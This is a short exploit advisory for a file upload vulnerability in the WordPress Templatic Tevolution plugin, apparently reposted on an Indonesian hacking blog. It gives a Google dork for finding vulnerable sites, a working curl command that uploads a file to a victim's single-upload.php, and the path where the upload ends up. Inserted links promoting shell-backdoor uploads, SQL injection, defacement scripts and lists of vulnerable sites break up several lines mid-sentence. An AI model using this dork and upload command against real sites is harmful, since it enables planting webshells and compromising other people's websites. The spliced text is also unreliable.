# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
# Date: 30-12-2016Baca juga — Cara Bypass File Restriction untuk Upload Shell Backdoor.
# Software Link: Permium plugin
# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
# Exploit Author: r3m1ck
# Website: https://www.r3m1ck.us/Baca juga — Cara Hack Database Website Pakai Aplikasi Android, Mudah!.
# Category: webapps
# Google Dork: inurl:"wp-content/plugins/Tevolution/"
Baca juga — Cara Hack Website dengan SQL injection Kali Linux, Hacked!.
1. Description
Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.Baca juga — Kumpulan Web Vuln SQL 2021-2022.
2. Proof of Concept
Baca juga — Cara Memasang Backlink di Webshell (Backdoor), Tetap Awet!.
curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
3. Uploaded file location:
Baca juga — 2000+ Script Deface HTML Terbaru 2023, Defacer Harus Punya!.
Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.
ex:
http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt
